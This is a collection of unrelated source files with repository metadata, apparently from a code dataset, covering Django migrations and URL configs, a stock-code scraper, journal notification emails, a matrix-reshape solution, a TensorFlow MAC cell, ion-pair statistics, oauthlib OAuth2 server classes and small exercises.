    for i in range(0, len(a)-length+1, 1):
        print(a[i:i + length])
        set1.add(a[i:i + length])
    for j in range(0, len(b)-length+1, 1):
        print(b[j:j + length])
        set2.add(b[j:j + length])
    list3 = list(set1.intersection(set2))
    print(list3)
    return list3
| [
"dmitrii.shimanskii@griddynamics.com"
] | dmitrii.shimanskii@griddynamics.com |
ba5d12e3a9f281a603a4f3fc0b6ae61ff59e2ad6 | b05bd7c104a51910c6ed9d6f0e8d039ffa108f2b | /carros/migrations/0004_auto_20201204_2106.py | c25e4f02c0364f388b0077ad46c71811b1b44762 | [] | no_license | BrunoVittor/TesteGregory | 76e12585d4532dc8ab4836c567b5ba56469139e5 | 2c7e3afdb2a62d0464189153a9ab150d69d89083 | refs/heads/master | 2023-04-01T22:56:49.422893 | 2021-03-31T22:49:59 | 2021-03-31T22:49:59 | 334,147,980 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # Generated by Django 2.2 on 2020-12-04 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
    # Relaxes Carros.ano to an optional integer (blank/null allowed).

    dependencies = [
        ('carros', '0003_auto_20201204_2103'),
    ]

    operations = [
        migrations.AlterField(
            model_name='carros',
            name='ano',
            field=models.IntegerField(blank=True, null=True),
        ),
    ]
| [
"bv.everit@itmss.com.br"
] | bv.everit@itmss.com.br |
1aa463d09d68651a8092b00176506f2a9cc07477 | 0a717438a8f828d5ad0ad7dffab53a4f5ecef970 | /ml_trading/ex02.py | 3b33821d52550004671ecb76744ad3e0328a431c | [] | no_license | swjo207/finance_study | 009a2ba0e27298f945bd00e8a656920050487196 | e4ed0cc5cce70781f94d82c680159b789364aea5 | refs/heads/master | 2020-12-24T19:28:06.558566 | 2016-06-01T12:14:38 | 2016-06-01T12:14:38 | 58,996,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 650 | py | import requests
from bs4 import BeautifulSoup
from stockcode import StockCode
def downloadCode(market_type):
    """POST the KOSCOM issue-search form and return the raw response body."""
    url = 'http://datamall.koscom.co.kr/servlet/infoService/SearchIssue'
    form_data = {'flag': 'SEARCH', 'marketDisabled': 'null', 'marketBit': market_type}
    response = requests.post(url, data=form_data)
    return response.content
def parseCodeHTML(html, market_type):
    """Parse the <option> list of a KOSCOM search page into a StockCode set.

    Each option's text is "<flag><6-char code> <company name>" and its
    value attribute holds the full ISIN-style code.
    """
    codes = StockCode()
    for option in BeautifulSoup(html).findAll('option'):
        if len(option) == 0:
            continue
        short_code = option.text[1:7]
        full_code = option.get('value')
        company_name = option.text[8:]
        codes.add(market_type, short_code, full_code, company_name)
    return codes
| [
"swjo207@gmail.com"
] | swjo207@gmail.com |
689fa8405d8adf818c5b3563f60186d16fa9f9f1 | 3b07655b0da227eec2db98ab9347c9e7bdbc3ffd | /scielomanager/editorialmanager/notifications.py | 076258bb112ce9c91be83ae60a0fc14ce5db7541 | [
"BSD-2-Clause"
] | permissive | scieloorg/scielo-manager | a1b7cc199e5f7c4d4b34fd81d46e180028299d7d | 0945f377376de8ef0ada83c35b4e2312062cdf45 | refs/heads/beta | 2023-07-12T08:23:59.494597 | 2017-09-28T18:39:39 | 2017-09-28T18:39:39 | 1,778,118 | 9 | 5 | BSD-2-Clause | 2023-09-05T19:42:58 | 2011-05-20T19:41:53 | Python | UTF-8 | Python | false | false | 3,509 | py | # coding: utf-8
import logging
from django.core.exceptions import ObjectDoesNotExist
from scielomanager.tools import get_users_by_group_by_collections, user_receive_emails
from scielomanager import notifications
logger = logging.getLogger(__name__)
class IssueBoardMessage(notifications.Message):
    """Email sent to a journal's editor about issue-board replication."""

    EMAIL_DATA_BY_ACTION = {
        'issue_add_no_replicated_board': {
            'subject_sufix': "Issue Board can't be replicated",
            'template_path': 'email/issue_add_no_replicated_board.txt',
        },
        'issue_add_replicated_board': {
            'subject_sufix': "Issue has a new replicated board",
            'template_path': 'email/issue_add_replicated_board.txt',
        },
    }

    def set_recipients(self, issue):
        """Target the journal's editor, honouring their email opt-out."""
        editor = getattr(issue.journal, 'editor', None)
        if not editor:
            logger.error("[IssueBoardMessage.set_recipients] Can't prepare a message, issue.journal.editor is None or empty. Issue pk == %s" % issue.pk)
            return
        if not user_receive_emails(editor):
            logger.info("[IssueBoardMessage.set_recipients] editor (user.pk: %s) does not have a profile or decides to not receive emails." % editor.pk)
            return
        self.recipients = [editor.email]
class BoardMembersMessage(notifications.Message):
    """Email about a board-member change, BCC'd to the collection's librarians."""

    EMAIL_DATA_BY_ACTION = {
        'board_add_member': {
            'subject_sufix': "Member of the journal board, was added",
            'template_path': 'email/board_add_member.txt',
        },
        'board_edit_member': {
            'subject_sufix': "Member of the journal board, was edited",
            'template_path': 'email/board_edit_member.txt',
        },
        'board_delete_member': {
            'subject_sufix': "Member of the journal board, was deleted",
            'template_path': 'email/board_delete_member.txt',
        }
    }

    def set_recipients(self):
        """ emails must be sent as BCC """
        self.recipients = []

    def set_bcc_recipients(self, member):
        """ recipients must belong to the same collection as member """
        member_collections = member.board.issue.journal.collections.all()
        if not member_collections:
            logger.error("[BoardMembersMessage.set_bcc_recipients] Can't define the collection of member (pk: %s), to filter bcc_recipients" % member.pk)
            return
        librarians = get_users_by_group_by_collections('Librarian', member_collections)
        if not librarians:
            logger.error("[BoardMembersMessage.set_bcc_recipients] Can't prepare a message, Can't retrieve a list of Librarian Users.")
            return
        subscribed = [librarian for librarian in librarians if user_receive_emails(librarian)]
        self.bcc_recipients = map(lambda u: u.email, subscribed)
def issue_board_replica(issue, action):
    """Notify the journal editor whether *issue*'s board could be replicated."""
    msg = IssueBoardMessage(action=action)
    msg.set_recipients(issue)
    msg.render_body({'issue': issue})
    return msg.send_mail()
def board_members_send_email_by_action(member, user, audit_log_msg, action):
    """Notify librarians that *member* was added/edited/deleted by *user*."""
    msg = BoardMembersMessage(action=action)
    msg.set_recipients()
    msg.set_bcc_recipients(member)
    msg.render_body({
        'user': user,
        'member': member,
        'issue': member.board.issue,
        'message': audit_log_msg,
    })
    return msg.send_mail()
| [
"juan.funez@gmail.com"
] | juan.funez@gmail.com |
44f150c666e75aa32b284dd253d435323b5f0de0 | 7dba60ae27ff247705607839348f017b85f5da16 | /nyumbax/migrations/0010_remove_hood_user.py | 9bd48cf28d900417152b7edac6e33f76bd08d027 | [
"MIT"
] | permissive | BwanaQ/nyumba-kumi | 7edccb6745ede6d9f6faf5bd8c0dcf6e24726991 | c264b0941c77a4d7175a2dc5380723bea1acf380 | refs/heads/master | 2023-04-05T09:32:34.867456 | 2021-04-13T15:54:16 | 2021-04-13T15:54:16 | 356,136,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | # Generated by Django 3.2 on 2021-04-13 04:31
from django.db import migrations
class Migration(migrations.Migration):
    # Drops the Hood.user foreign-key field.

    dependencies = [
        ('nyumbax', '0009_rename_name_hood_title'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='hood',
            name='user',
        ),
    ]
| [
"thunjawax@gmail.com"
] | thunjawax@gmail.com |
bb7bd7965485c691b95bcf7005e93b16f68e6785 | 7fd3c972968416c27982194220e8f83f88bda99a | /Algorithms_LinkedLists/Code/566_ReshapeMatrix/v0.py | 4dc8e8d4bb77e9a4f4c635e299c5331e7412b4c6 | [] | no_license | AKHeit/LeetCode | a5093271eb1d9e27776e6b491f972be607802a72 | d91f60431aa7767d1a854e0e27a26023fc8ec45c | refs/heads/master | 2021-09-02T13:08:27.073505 | 2018-01-02T22:49:07 | 2018-01-02T22:49:07 | 113,120,000 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,395 | py | """
Problem: 566 Reshape Matrix
Level: Easy
Tags: Basic, Math
Technique: Simple Math
Status: Accepted
Problem Description:
In MATLAB, there is a very useful function called 'reshape', which can reshape a matrix into a new one with different size but keep its original data.
You're given a matrix represented by a two-dimensional array, and two positive integers r and c representing the row number and column number of the wanted reshaped matrix, respectively.
The reshaped matrix need to be filled with all the elements of the original matrix in the same row-traversing order as they were. If the 'reshape' operation with given parameters is possible and legal, output the new reshaped matrix; Otherwise, output the original matrix.
"""
class Solution(object):
    """
    Solution format for LeetCode
    """

    def matrixReshape(self, nums, r, c):
        """
        Reshape `nums` into an r x c matrix, preserving row-major order.
        Returns the original matrix unchanged when the reshape is illegal.

        :type nums: List[List[int]]
        :type r: int
        :type c: int
        :rtype: List[List[int]]
        """
        rows = len(nums)
        cols = len(nums[0])
        # A reshape is only legal when the element count is preserved.
        if rows * cols != r * c:
            return nums
        # Flatten row-major.  list.extend is amortized O(len(row)); the
        # previous `array = array + row` rebuilt the list every iteration
        # (accidentally O(n^2) overall).
        flat = []
        for row in nums:
            flat.extend(row)
        # Slice the flat vector back into r rows of c elements.  (This also
        # avoids the old `[[None]*c]*r` initializer, whose rows were aliases
        # of one another.)
        return [flat[i * c:(i + 1) * c] for i in range(r)]
if __name__== "__main__":
    """
    test code for terminal runs
    both unit tests and full answers
    """
    def print_test(ans_e,ans_o,name):
        """
        prints tests in standardized format
        :type ans_e: expected answer in printable format
        :type ans_o: observed answer in printable format
        """
        # NOTE(review): the Expected/Observed lines below close over the
        # module-level `method` instead of using the `name` parameter;
        # callers always pass name == method, so output is unaffected.
        print('~'*40)
        if ans_o != ans_e:
            error = 1
            print("########## FAIL ##########")
            print("TEST: {} :: Status: FAIL".format(name))
        else:
            error = 0
            print("TEST: {} :: Status: PASS".format(name))
        print('TEST: {} :: Expected: {}'.format(method, ans_e))
        print('TEST: {} :: Observed: {}'.format(method, ans_o))
        return error
    # Accumulate failures across the three cases below.
    err = 0
    sol = Solution()
    # test matrixReshape 1: legal reshape 2x2 -> 1x4
    method = 'matrixReshape'
    matrix = [[1, 2], [3, 4]]
    rows = 1
    columns = 4
    observed_answer = sol.matrixReshape(matrix, rows, columns)
    expected_answer = [[1,2,3,4]]
    e = print_test(expected_answer, observed_answer,method)
    err = err + e
    # test matrixReshape 2: legal reshape 2x2 -> 4x1
    method = 'matrixReshape'
    matrix = [[1, 2], [3, 4]]
    rows = 4
    columns = 1
    observed_answer = sol.matrixReshape(matrix, rows, columns)
    expected_answer = [[1], [2], [3], [4]]
    e = print_test(expected_answer, observed_answer,method)
    err = err + e
    # test matrixReshape 3: illegal reshape returns the input unchanged
    method = 'matrixReshape'
    matrix = [[1, 2], [3, 4]]
    rows = 2
    columns = 5
    observed_answer = sol.matrixReshape(matrix, rows, columns)
    expected_answer = matrix
    e = print_test(expected_answer, observed_answer,method)
    err = err + e
    print('')
    if err == 0:
        print('PASSED ALL TESTS')
    else:
        print('FAILED A TEST: DEBUG!!!')
| [
"heitman.alexander@gmail.com"
] | heitman.alexander@gmail.com |
42ae7af6024d205e88ad2aa61c2d8c5c3a071dc3 | 92cc5c61799e93446d6562a6cc9fb74e9220c6c7 | /mac-graph/cell/mac_cell.py | a159f0e137574775b4d6c51682a27dc300eb9ca7 | [
"Unlicense"
] | permissive | houqp/mac-graph | 2728c89605b71e7ac610303e7100797787f0fa30 | ae91e5708d2a63d157a397b608acf720f4c4d840 | refs/heads/master | 2020-03-22T20:41:10.786619 | 2018-07-11T19:20:41 | 2018-07-11T19:20:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,995 | py |
import tensorflow as tf
from .read_cell import *
from .memory_cell import *
from .control_cell import *
from .output_cell import *
from ..util import *
class MACCell(tf.nn.rnn_cell.RNNCell):
	"""RNN cell running one MAC reasoning step: control -> read -> memory -> output."""

	def __init__(self, args, features, question_state, question_tokens, vocab_embedding):
		self.args = args
		self.features = features
		self.question_state = question_state
		self.question_tokens = question_tokens
		self.vocab_embedding = vocab_embedding
		super().__init__(self)

	def __call__(self, inputs, state):
		"""Run this RNN cell on inputs, starting from the given state.

		Args:
			inputs: **Unused!** `2-D` tensor with shape `[batch_size, input_size]`;
				the cell is driven by the question/knowledge tensors captured
				at construction time.
			state: a `(control_state, memory_state)` tuple, each of shape
				`[batch_size, s]` for the corresponding entry of `self.state_size`.

		Returns:
			A pair containing:
			- Output: A `2-D` tensor with shape `[batch_size, self.output_size]`.
			- New state: a `(control_state, memory_state)` tuple matching the
				arity and shapes of `state`.
		"""
		prev_control, prev_memory = state

		next_control = control_cell(self.args, self.features,
			prev_control, self.question_state, self.question_tokens)

		read_vector = read_cell(self.args, self.features,
			prev_memory, next_control, self.vocab_embedding)

		next_memory = memory_cell(self.args,
			prev_memory, read_vector, next_control)

		step_output = output_cell(self.args, self.features,
			self.question_state, next_memory)

		return step_output, (next_control, next_memory)

	@property
	def state_size(self):
		"""Size tuple (control_state, memory_state)."""
		return (self.args["bus_width"], self.args["bus_width"])

	@property
	def output_size(self):
		return self.args["answer_classes"]
| [
"david@sketchdeck.com"
] | david@sketchdeck.com |
24a2295b2bcd8c27d0e2679b57d06861944a3c4c | fb5d1d93c7432912f7f5e1d9ff50309f49bf6b16 | /computeIonpairstat.py | 4759b29657ec89821751cf212070247ea465b370 | [] | no_license | Eileencaraway/Joyjit-s-Python-Script | 0089635bdd8609d9ae28aa03f0029304d16542b0 | 48c29fa7f1a0060b7fc5b791ce635e1ecdeb2e98 | refs/heads/master | 2021-09-20T15:21:14.717982 | 2018-08-11T06:56:57 | 2018-08-11T06:56:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,234 | py | #!/usr/bin/env python
import sys
import os
import StringIO
import math
import numpy
from numpy import *
from histogram import *
#####################################################################################
#####################################################################################
"""
The script computes ratio of free ions and single paired ions from "Li-TFSIindex.dat"
and "MPPY-TFSIindex.dat"
"""
#####################################################################################
#####################################################################################
# Command-line handling (Python 2): -input <paramfile> plus -dgamma
# tsave tmin tmax dt.  Parsed values become module-level globals used
# by readIonPairs() and the main loop below.
if(len(sys.argv)<6) :
    sys.stderr.write('Usage : -input tmin tmax dt')
    print
    exit()
carg =1
tsave=0.01
tot_peo=0
nm_peo=0
tot_li=0
tot_mppy=0
tot_tfsi=0
for word in sys.argv[1:]:
    if word[0] == "-":
        if word == "-input":
            carg += 1
            # Parameter file: one count per line (PEO chains, monomers,
            # Li, MPPY, TFSI).
            ifile = open(sys.argv[carg])
            param = ifile.readlines()
            tot_peo = int(param[0])
            nm_peo = int(param[1])
            tot_li = int(param[2])
            tot_mppy = int(param[3])
            tot_tfsi = int(param[4])
            carg +=1
        # NOTE(review): despite its name, -dgamma sets the time-grid
        # parameters (tsave, tmin, tmax, dt) — confirm flag naming.
        if word == "-dgamma":
            carg +=1
            tsave = float(sys.argv[carg])
            carg +=1
            tmin = float(sys.argv[carg])
            carg +=1
            tmax = float(sys.argv[carg])
            carg +=1
            dt = float(sys.argv[carg])
            carg +=1
###
def readIonPairs(indat, arr, tot_cats):
    """Mark ion pairings from an index file into arr and close the file.

    Each data line holds: time, cation index, then the indices of the
    paired anions.  The (time, cation) pair is flattened into a single
    column using the module-level tmin/tsave parsed from the command line.
    Lines starting with '#' or empty lines are skipped.  Returns 0.
    """
    raw_lines = indat.readlines()
    indat.close()
    for raw in raw_lines:
        if raw.startswith("#") or raw.startswith("\n"):
            continue
        fields = fromstring(raw, sep=" ")
        # flatten (time, cation) into one column index of arr's rows
        column = int(floor((fields[0]-tmin+0.000001)*tot_cats/tsave + fields[1]))
        for anion in fields[2:]:
            arr[int(anion)][column] = 1
    return 0
#################################################################################
""" reading data files Li-TFSIindex.dat and MPPY-TFSIindex.dat """
#################################################################################
# One row per TFSI anion; columns flatten (time step, cation index).
tvals = int(floor((tmax-tmin+0.000001)/tsave) + 1)
tvalswli = tvals*tot_li
tvalswmy = tvals*tot_mppy
tfsiwli = [zeros(tvalswli) for i in range(tot_tfsi)]
tfsiwmy = [zeros(tvalswmy) for i in range(tot_tfsi)]
sys.stderr.write('# rows: '+str(tvalswli)+' '+str(tvalswmy)+'\n')
f1 = open('Li-TFSIindex.dat')
readIonPairs(f1, tfsiwli, tot_li)
if tot_mppy > 0:
    f2 = open('MPPY-TFSIindex.dat')
    readIonPairs(f2, tfsiwmy, tot_mppy)
#################################################################################
""" computing free and paired ions """
#################################################################################
# hf* count frames in which an ion is free, hb* frames in which it has
# exactly one partner; an ion counts as free/paired over a window of
# length dt only if it stayed so in (essentially) every frame.
hfli = Histogram(-0.5, tot_li-0.5, tot_li)
hbli = Histogram(-0.5, tot_li-0.5, tot_li)
hftfsi = Histogram(-0.5, tot_tfsi-0.5, tot_tfsi)
hbtfsi = Histogram(-0.5, tot_tfsi-0.5, tot_tfsi)
if tot_mppy > 0:
    hfmppy = Histogram(-0.5, tot_mppy-0.5, tot_mppy)
    hbmppy = Histogram(-0.5, tot_mppy-0.5, tot_mppy)
fli = pli = ftfsi = ptfsi = fmppy = pmppy = 0
count = 0.0
t = tmin
# Slide a window of length dt over [tmin, tmax] in steps of tsave.
while(t<tmax-dt+0.00001):
    hfli.reset()
    hbli.reset()
    hftfsi.reset()
    hbtfsi.reset()
    if tot_mppy > 0:
        hfmppy.reset()
        hbmppy.reset()
    ivals = 0.0
    tit = t
    while(tit<t+dt+0.00001):
        # Per-frame partner counts for each cation.
        ng_li = [0 for i in range(tot_li)]
        ng_my = [0 for i in range(tot_mppy)]
        tsli = int(floor((tit-tmin+0.000001)*tot_li/tsave))
        tsmy = int(floor((tit-tmin+0.000001)*tot_mppy/tsave))
        for i in range(tot_tfsi):
            ng_ti = 0
            for j in range(tot_li):
                if tfsiwli[i][tsli+j] > 0.99:
                    ng_li[j] += 1
                    ng_ti += 1
            for j in range(tot_mppy):
                if tfsiwmy[i][tsmy+j] > 0.99:
                    ng_my[j] += 1
                    ng_ti += 1
            if ng_ti == 0:
                hftfsi.store(i)
            if ng_ti == 1:
                hbtfsi.store(i)
        for i in range(tot_li):
            if ng_li[i] == 0:
                hfli.store(i)
            if ng_li[i] == 1:
                hbli.store(i)
        for i in range(tot_mppy):
            if ng_my[i] == 0:
                hfmppy.store(i)
            if ng_my[i] == 1:
                hbmppy.store(i)
        ivals += 1.0
        tit += tsave
    # An ion is counted only if the state held for the full window.
    for i in range(tot_li):
        if (hfli.n[i]/ivals) > 0.9999:
            fli += 1
        if (hbli.n[i]/ivals) > 0.9999:
            pli += 1
    for i in range(tot_tfsi):
        if (hftfsi.n[i]/ivals) > 0.9999:
            ftfsi += 1
        if (hbtfsi.n[i]/ivals) > 0.9999:
            ptfsi += 1
    for i in range(tot_mppy):
        if (hfmppy.n[i]/ivals) > 0.9999:
            fmppy += 1
        if (hbmppy.n[i]/ivals) > 0.9999:
            pmppy += 1
    count += 1.0
    t += tsave
###
# Window-averaged fractions: dt, free Li, paired Li, free TFSI, paired TFSI
# (and the MPPY pair when present).  Python 2 print statements.
print dt, fli/tot_li/count, pli/tot_li/count, ftfsi/tot_tfsi/count, ptfsi/tot_tfsi/count,
if tot_mppy > 0:
    print fmppy/tot_mppy/count, pmppy/tot_mppy/count,
print
| [
"noreply@github.com"
] | Eileencaraway.noreply@github.com |
adff1f364ab90a5fe4e91a4602dacc1549f8b535 | 5d189a062dc0118c9c5915264d9646d6f747e08f | /oauthlib/oauth2/rfc6749/endpoints/pre_configured.py | c2f33afd68a4a2c2e68970663c3f6e0729e007ec | [] | no_license | Zhuoli/SocialComp.HW3 | a19a4c930e2976d7043ddd42c778857737e45c55 | 3a178328c99ef38fe0ab0c10955d73363d2e2bfd | refs/heads/master | 2020-04-28T13:33:31.017149 | 2013-11-14T15:33:44 | 2013-11-14T15:33:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,066 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
"""
oauthlib.oauth2.rfc6749
~~~~~~~~~~~~~~~~~~~~~~~
This module is an implementation of various logic needed
for consuming and providing OAuth 2.0 RFC6749.
"""
from ..tokens import BearerToken
from ..grant_types import AuthorizationCodeGrant
from ..grant_types import ImplicitGrant
from ..grant_types import ResourceOwnerPasswordCredentialsGrant
from ..grant_types import ClientCredentialsGrant
from ..grant_types import RefreshTokenGrant
from .authorization import AuthorizationEndpoint
from .token import TokenEndpoint
from .resource import ResourceEndpoint
class Server(AuthorizationEndpoint, TokenEndpoint, ResourceEndpoint):
    """An all-in-one endpoint featuring all four major grant types."""

    def __init__(self, request_validator, token_expires_in=None,
                 token_generator=None, *args, **kwargs):
        """Wire every RFC 6749 grant type against a single validator."""
        authorization_code = AuthorizationCodeGrant(request_validator)
        implicit = ImplicitGrant(request_validator)
        password = ResourceOwnerPasswordCredentialsGrant(request_validator)
        client_credentials = ClientCredentialsGrant(request_validator)
        refresh = RefreshTokenGrant(request_validator)
        # One bearer-token handler is shared by all three endpoints.
        bearer = BearerToken(request_validator, token_generator,
                             expires_in=token_expires_in)
        AuthorizationEndpoint.__init__(
            self,
            default_response_type='code',
            response_types={'code': authorization_code, 'token': implicit},
            default_token_type=bearer)
        TokenEndpoint.__init__(
            self,
            default_grant_type='authorization_code',
            grant_types={
                'authorization_code': authorization_code,
                'password': password,
                'client_credentials': client_credentials,
                'refresh_token': refresh,
            },
            default_token_type=bearer)
        ResourceEndpoint.__init__(
            self,
            default_token='Bearer',
            token_types={'Bearer': bearer})
class WebApplicationServer(AuthorizationEndpoint, TokenEndpoint, ResourceEndpoint):
    """An all-in-one endpoint featuring Authorization code grant and Bearer tokens."""

    def __init__(self, request_validator, token_generator=None,
                 token_expires_in=None, **kwargs):
        """Construct a new web application server.

        :param request_validator: An implementation of oauthlib.oauth2.RequestValidator.
        :param token_generator: A function to generate a token from a request.
        :param kwargs: Extra parameters to pass to authorization endpoint,
                       token endpoint and resource endpoint constructors.
        """
        authorization_code = AuthorizationCodeGrant(request_validator)
        refresh = RefreshTokenGrant(request_validator)
        bearer = BearerToken(request_validator, token_generator,
                             expires_in=token_expires_in)
        AuthorizationEndpoint.__init__(
            self,
            default_response_type='code',
            response_types={'code': authorization_code},
            default_token_type=bearer)
        TokenEndpoint.__init__(
            self,
            default_grant_type='authorization_code',
            grant_types={
                'authorization_code': authorization_code,
                'refresh_token': refresh,
            },
            default_token_type=bearer)
        ResourceEndpoint.__init__(
            self,
            default_token='Bearer',
            token_types={'Bearer': bearer})
class MobileApplicationServer(AuthorizationEndpoint, ResourceEndpoint):
    """An all-in-one endpoint featuring Implicit code grant and Bearer tokens."""

    def __init__(self, request_validator, token_generator=None,
                 token_expires_in=None, **kwargs):
        """Expose only the implicit grant (no token endpoint needed)."""
        implicit = ImplicitGrant(request_validator)
        bearer = BearerToken(request_validator, token_generator,
                             expires_in=token_expires_in)
        AuthorizationEndpoint.__init__(
            self,
            default_response_type='token',
            response_types={'token': implicit},
            default_token_type=bearer)
        ResourceEndpoint.__init__(
            self,
            default_token='Bearer',
            token_types={'Bearer': bearer})
class LegacyApplicationServer(TokenEndpoint, ResourceEndpoint):
    """An all-in-one endpoint featuring Resource Owner Password Credentials grant and Bearer tokens."""

    def __init__(self, request_validator, token_generator=None,
                 token_expires_in=None, **kwargs):
        """Expose the password grant plus refresh tokens."""
        password = ResourceOwnerPasswordCredentialsGrant(request_validator)
        refresh = RefreshTokenGrant(request_validator)
        bearer = BearerToken(request_validator, token_generator,
                             expires_in=token_expires_in)
        TokenEndpoint.__init__(
            self,
            default_grant_type='password',
            grant_types={
                'password': password,
                'refresh_token': refresh,
            },
            default_token_type=bearer)
        ResourceEndpoint.__init__(
            self,
            default_token='Bearer',
            token_types={'Bearer': bearer})
class BackendApplicationServer(TokenEndpoint, ResourceEndpoint):
    """An all-in-one endpoint featuring Client Credentials grant and Bearer tokens."""

    def __init__(self, request_validator, token_generator=None,
                 token_expires_in=None, **kwargs):
        """Expose only the client-credentials grant (machine-to-machine)."""
        client_credentials = ClientCredentialsGrant(request_validator)
        bearer = BearerToken(request_validator, token_generator,
                             expires_in=token_expires_in)
        TokenEndpoint.__init__(
            self,
            default_grant_type='client_credentials',
            grant_types={'client_credentials': client_credentials},
            default_token_type=bearer)
        ResourceEndpoint.__init__(
            self,
            default_token='Bearer',
            token_types={'Bearer': bearer})
| [
"ruanqizhen@gmail.com"
] | ruanqizhen@gmail.com |
7a6721be75418ccf2e20180da4156ca261b1a8a8 | 7573f7485a5039f6374d5740009cc33ecf83ef62 | /lishengchun/uploadsets.py | 278e553db694d23144ae2d88742e55d0574ca6a1 | [] | no_license | hugleecool/lishengchun | 5323eb851b7d8b007655f2e2d1ba92026861a134 | 7c1ebb4bc746320f3c7605045a8300220c97cb39 | refs/heads/master | 2021-01-18T13:22:36.737105 | 2014-02-15T10:58:29 | 2014-02-15T10:58:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 109 | py | # coding: utf-8
from flask.ext.uploads import UploadSet, IMAGES
# Flask-Uploads set for work images; IMAGES restricts uploads to the
# standard image extensions.
workimages = UploadSet('workimages', IMAGES) | [
"hustlzp@qq.com"
] | hustlzp@qq.com |
8113e1b93465b1d107bce5ef77cae82100458f29 | e08bc87afbc165ed0cd27afe2c7908323e08cd8b | /blogs/urls.py | 18127f13d374ebe6529a203214700d2a661a6a70 | [] | no_license | Code-Institute-Submissions/mcranter-Pwdr-Brand_JulyResub | 6060c341e973253a3a45d5df0d3dbe3e4581b811 | 6d9d1f347fd31b34d64f184a540b22ea0b3bba33 | refs/heads/master | 2023-07-01T09:19:28.618767 | 2021-07-25T11:54:03 | 2021-07-25T11:54:03 | 390,705,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | from django.contrib import admin
# Register your models here.
from . import views
from django.urls import path
# Blog routes: list, detail by slug, and the CRUD views.
urlpatterns = [
    path("", views.post, name="blogs"),
    path("detail/<slug:slug>/", views.post_detail, name="post_detail"),
    path("add_blog/", views.add_post, name="add_post"),
    path("edit_blog/<slug:slug>/", views.edit_post, name="edit_post"),
    path("delete_blog/<slug:slug>/", views.delete_post, name="delete_post"),
]
| [
"mcranter@gmail.com"
] | mcranter@gmail.com |
d102939de5fab1bba6d0f25bad66b355c377e36b | 3d7cd241d86da789528ebd18cd436932b52f136e | /complaints/urls.py | 04620e0d9c8699d2ad910ec6ab4a5df3d5b3eeb0 | [] | no_license | Arpit-X/ACL | 323bd09228abd61acf785f7eb627d8b1b29ce35a | 3d116e2c03f737caa676bd35bac1945e0e304d8b | refs/heads/master | 2020-04-26T07:52:55.267484 | 2019-03-03T12:21:38 | 2019-03-03T12:21:38 | 173,406,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from complaints import views
# DRF router generates the standard list/detail routes for the viewset
# at the root of this app's URL namespace.
router = DefaultRouter()
router.register(r'', views.ComplaintViewset)
urlpatterns = [
    path('', include(router.urls)),
] | [
"arpit.gupta@ibigroup.com"
] | arpit.gupta@ibigroup.com |
2728120e2c4541f55d6851e56129bb3006d29142 | 71db6c302492c470f90c63a9dd57181337674a18 | /ch3/bai3.24.py | 2859708e19671a2202817314990f41fd21f12bae | [] | no_license | huybv1999/PythonSolution | 44dd474890bdea4a7bfc108a7d13eeaaca06f36e | 54fff433bb370e4b1cb4f980660a6f77fdb4d3af | refs/heads/main | 2023-01-19T23:55:06.867269 | 2020-11-30T15:25:53 | 2020-11-30T15:25:53 | 305,415,533 | 0 | 0 | null | 2020-11-28T19:54:12 | 2020-10-19T14:40:54 | Python | UTF-8 | Python | false | false | 292 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 5 18:15:36 2020
@author: huybv1998
"""
n = int(input("nhap 1 so n : "))
# Print every perfect number below n: a number equal to the sum of its
# proper divisors (6, 28, 496, ...).
for candidate in range(1, n):
    divisor_sum = sum(d for d in range(1, candidate) if candidate % d == 0)
    if divisor_sum == candidate:
        print(divisor_sum)
| [
"noreply@github.com"
] | huybv1999.noreply@github.com |
0a2d71946f7a3beb7d3039832ef4d851ca101ab9 | 6da19be45ff986768eb820f11691977cb3c84772 | /Python/5_Advance_buily_in_functions/501_generator_example/app.py | f86cf0322af9c70c5287d5b23541ecb63ab41ed6 | [] | no_license | alexp01/trainings | 9e72f3a571292b79d2b1518f564d2dc0a774ef41 | 9d8daee16f15e0d7851fab12ab3d2505386a686c | refs/heads/master | 2023-05-04T23:37:13.243691 | 2023-05-02T08:02:53 | 2023-05-02T08:02:53 | 272,425,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 867 | py |
# https://www.udemy.com/course/the-complete-python-course/learn/lecture/9445596#questions
# yield can be used to temporary stop a function, so that you can coninue it afterwards
def get_100_numbers() -> int:
i = 0
while i < 100:
yield i
i +=1
# yield is like a return, but it will also remember inside the function the last execution point and the values
# so when it reaches yield it will return i, and when its called again by next(variable), it will continue with i = I=1, and then run the while again
x = get_100_numbers()
print (x)
print (next(x)) # this will call again the function and it will continue from where it was stopped -> when i = 0
print (next(x)) # this will call again the function and it will continue from where it was stopped -> when i = 1
print(list(x)) # this will execute the function until it reaches the limit | [
"34630182+alexp01@users.noreply.github.com"
] | 34630182+alexp01@users.noreply.github.com |
ecf131c42e0620bb2b477ded3c859a74ccab5c4d | 049c5b8b38960692a40a46f41c91a39137437fcd | /perfect.py | 2513bedd8798d203bf322a2abb7b34e72e720835 | [] | no_license | sanketmakh/PROJECT | 95e3c79f8bf6c4533d6beec0f0a141afe7ba4dc9 | 4cfecb6702f7dc9af1fb3502b2a9414e214bbae8 | refs/heads/main | 2023-06-18T23:51:52.500055 | 2021-07-10T04:49:23 | 2021-07-10T04:49:23 | 384,611,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,149 | py | # Health Management System
# Total 6 Files, 3 For exercise and 3 For for diet
# 3 clients - Harry, Rohan and Hammad
# write a function that when executed takes as input client name
# one more function to retrieve exercise or food for any client
import datetime
def getdate():
return datetime.datetime.now()
def add_func(client):
if client == "1":
exer_diet = input("Enter number:\n1)Exercise\n2)Diet:")
